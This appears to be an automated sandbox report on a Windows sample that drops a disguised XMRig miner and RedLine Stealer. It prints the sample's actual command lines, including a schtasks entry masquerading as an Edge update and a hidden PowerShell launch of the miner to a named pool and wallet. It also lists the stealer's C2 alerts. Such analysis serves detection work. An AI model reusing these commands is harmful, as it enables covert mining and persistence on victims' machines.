Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 22, 2025, 11:54 a.m.	April 22, 2025, 11:57 a.m.

Size	2.6MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`8c2df7e94aecf922bac33303693edc40`
SHA256	`0775e8cd43f856f12da4aa77fcef506b45c1da669bd37a93ddcb1a1a1f1d4aa3`
CRC32	`2FDF1BFB`
ssdeep	`49152:kDjlabwz922E1G8hl3INPHfdBcZiyuNFBAkpVOZgyo2upnA4yOQC2:0qwE2E1G4ONHdBcMyuNFBAkHOZNoBA4m`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb
Yara	PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library IsPE64 - (no description) Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file

pOqYWAZ.exe "C:\Users\test22\AppData\Local\Temp\pOqYWAZ.exe"
1680
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\SystemService\install.bat" "
  2228
  - net.exe net session
    2296
    - net1.exe C:\Windows\system32\net1 session
      2340
  - schtasks.exe schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
    2404
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
    2512
    - powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
      2632
      - sysdrv.exe "C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe" --url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25
        2336
    - timeout.exe timeout /t 180
      2532
  - crypted.exe C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
    2600

Name	Response	Post-Analysis Lookup
pool.hashvault.pro	A 157.20.104.252 A 51.79.163.234	51.79.163.234

IP Address	Status	Action
157.20.104.252	Active	Moloch
164.124.101.2	Active	Moloch
193.233.237.109	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49175 -> 193.233.237.109:1912	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 193.233.237.109:1912	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.237.109:1912	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 193.233.237.109:1912 -> 192.168.56.103:49175	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.237.109:1912	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 193.233.237.109:1912 -> 192.168.56.103:49175	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49175 -> 193.233.237.109:1912	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.103:49181 157.20.104.252:443	None	None	None

Queries for the computername (21 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 22, 2025, 11:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 22, 2025, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 22, 2025, 11:55 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 22, 2025, 11:48 a.m.			0	0
IsDebuggerPresent April 22, 2025, 11:55 a.m.			0	0
IsDebuggerPresent April 22, 2025, 11:55 a.m.			0	0

Command line console output was observed (50 out of 154 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: ABOUT console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: XMRig/6.22.2 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: MSVC/2019 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: (built for Windows console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: x86-64, console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: 64 bit) console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: LIBS libuv/1.49.2 OpenSSL/3.0.15 hwloc/2.11.2 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: HUGE PAGES console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: permission granted console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: 1GB PAGES console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: unavailable console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: CPU Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz (1) console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: 64-bit console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: AES console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: VM console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: L2: console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: 0.5 MB console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: L3: console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: 18.0 MB console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: C console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: T console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: NUMA: console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: MEMORY console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: GB console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: MOTHERBOARD console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: innotek GmbH console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: VirtualBox console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: DONATE console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: ASSEMBLY auto: console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: intel console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: POOL #1 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: pool.hashvault.pro:443 console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: algo console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: auto console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: COMMANDS console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: h console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: ashrate, console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: p console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: ause, console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: r console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: esume, console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: re console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: s console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: ults, console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: c console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: onnection console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: OPENCL console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: disabled console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: CUDA console_handle: 0x0000000000000013	1	1
WriteConsoleW April 22, 2025, 11:55 a.m.	buffer: disabled console_handle: 0x0000000000000013	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000038cb90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d0b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d0b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d0b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d350 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d350 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d3c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d3c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d3c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000038cea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000038cea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000038cea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dd60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dd60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dd60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dd60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dd60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b18dc80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b1783e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b1783e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b1783e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b1783e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b1b2240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:48 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b1b2240 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f4060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f4060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f4060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f4060 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f40e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f40e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f3fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f3fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f3fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2025, 11:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f3fe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 22, 2025, 11:47 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.didat
section	_RDATA

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (19 events)

Time & API	Arguments	Status
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x1f60d62 0x1f60f45 0x1f60e59 mscorlib+0x34b466 @ 0x7290b466 mscorlib+0x34b429 @ 0x7290b429 mscorlib+0x3022a6 @ 0x728c22a6 mscorlib+0x34b2d2 @ 0x7290b2d2 mscorlib+0x34b1f7 @ 0x7290b1f7 mscorlib+0x34b13b @ 0x7290b13b mscorlib+0x30d3a5 @ 0x728cd3a5 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x7404f1cc LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73fb7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73fb7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73fb7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73f4c3bf DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x7404f164 DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x7402f54d DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7405a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: f7 7d d8 8b 4d bc 39 09 e8 5f 68 44 72 89 45 d4 exception.instruction: idiv dword ptr [ebp + 0xffffffd8] exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x1f61071 registers.esp: 83227536 registers.edi: 83227604 registers.eax: 0 registers.ebp: 83227624 registers.edx: 0 registers.ebx: 36749888 registers.esi: 36750148 registers.ecx: 17	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x1f67a15 0x1f6789e 0x1f62883 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x1f67b08 registers.esp: 4845304 registers.edi: 4845356 registers.eax: 0 registers.ebp: 4845368 registers.edx: 2907128 registers.ebx: 4846468 registers.esi: 37914436 registers.ecx: 0	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de337b 0x6de2def 0x6de2ced 0x6de12d4 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74877f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74874de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6de70e3 registers.esp: 4844164 registers.edi: 4844456 registers.eax: 0 registers.ebp: 4844172 registers.edx: 0 registers.ebx: 4846468 registers.esi: 38175540 registers.ecx: 37566304	1
__exception__ April 22, 2025, 11:55 a.m.	stacktrace: 0x6de70a0 0x6de337b 0x6de2def 0x6de2d05 0x6de12d4 0x6de04a0 0x1f67bf7 0x1f628cd 0x1f624ae 0x1f6067f 0x1f60108 0x1f6009b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f42652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f5264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f52e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x740074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x74007610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74091dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74091e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74091f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7409416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 